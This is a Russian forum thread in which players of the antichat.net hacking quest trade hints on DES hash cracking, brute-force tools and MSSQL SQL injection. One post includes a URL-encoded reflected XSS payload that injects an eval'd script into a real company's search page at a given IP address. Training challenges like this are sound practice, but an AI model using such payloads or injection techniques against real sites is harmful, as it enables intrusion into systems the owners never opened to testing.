Обсуждение quest.antichat.net

Привет слушаите я тут 11 левел прохожу ну где ftp сервер так я там des достал а рассшифровать не могу там что большой паророль с разными символами или у меня маленткий словарь

 

Пароли везде простые. Значит что-то не так делаешь

 

Вопрос по 19 уровню. В чём там дело? Перепробовал кучу запросов, никакого результата нет, если только обычную кавычку ввести есть эффект. Запросы пишу строчными буквами, без комментариев в конце, как и сказано.

 

Делай все по шаблону. Там все просто. Читай маны по MSSQL

 

Влключите плз 18 уровень!

 

Нет, не работает. Да пока и не будет.

 

Ребята, я застрял на этой херне с маркой телефона, я ввожу пароль, но каждый раз меня посылают на ***. Зато вот накопал это на официальном сайте марки телефона, предполагаемой мною, XSS:
http://65.222.158.141/search?q=%22%3E%3C%73%63%72%69%70%74%3E%78%58%78%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%39%37%2C%31%30%38%2C%31%30%31%2C%31%31%34%2C%31%31%36%2C%34%30%2C%33%39%2C%37%32%2C%39%37%2C%39%39%2C%31%30%37%2C%31%30%31%2C%31%30%30%2C%33%32%2C%39%38%2C%31%32%31%2C%33%32%2C%31%32%36%2C%36%39%2C%31%31%38%2C%31%30%35%2C%37%36%2C%31%32%36%2C%33%39%2C%34%31%29%3B%65%76%61%6C%28%78%58%78%29%3B%3C%2F%73%63%72%69%70%74%3E&output=xml_no_dtd&site=global-en&restrict=global-en&client=frontend_global_en&oe=UTF-8&ie=UTF-8&proxystylesheet=frontend_global_en&filter=p

 

~EviL~ не там копаешь =)

 

Поздравляем! Вы прошли Квест!
Все, теперь логику language понял, )
А когда будет 3-ий квест?

 

Кто бы знал когда он будет... Это не кому не известно, и все покрыто мраком, сам хочу 3 част, даже не могу ожидать что же там будет)))

 

.:Первый квест супер!:.

Разработчикам похвала за интересные и хитрые ходы.
Вы лучшие, так держать!!!


Всем прошедшим, Респект!

Мне потребовалось прилично времени из-за невнимательности. Теперь появились практические навыки повышения безопасности web-разработок.


P.S. Пора приступать ко второй части.

 

Level 19.
Подскажите что там к чему. Поиск по этой теме никак мне не помог с решением. Этот эмулятор выдает ли вообще какие нибудь ошибки или принимает только 1 правильный запрос и все?

 

Только правильные ответы.
Там MSSQL, смотрите manual там ссылка есть.

 

Реально имя таблицы в которой содержатся пасс и логин нужно узнавать через information schema tables?

 

Не туда полез. Не в те дебри.

 

Не забывай, что в таблице есть ещё такие вещи, как колонки ... Видимо, в этом твоя проблема...

 

Не ребята, че то этот вопрос для меня не берущийся. Дайте, если можно, подсказку более конкретную. Можно ко мне в личку, если сюда такие подсказки выкладывать не канает.

 

Прив фсем!
Квест аффигенный! Ребзу респект!

Долго сидел на 4-ом, InetCrack'ом нифига не получалось, побробовал AccessDiver - получилось
Довольно долго сидел на 8-ом, ибо SQL знаю плохо, читал мануалы. Теперь вот на 19-м застрял... Помогите, плииииизз! Я SQL вообще плохо знаю!

 

back0rifice в своем мануале по прохождению давал ссылку по этой теме:
http://inattack.ru/article/163.html
Делай по примерам с инатак

 

Фсе, 19-й прошел, спасибо phol1eadeux'у)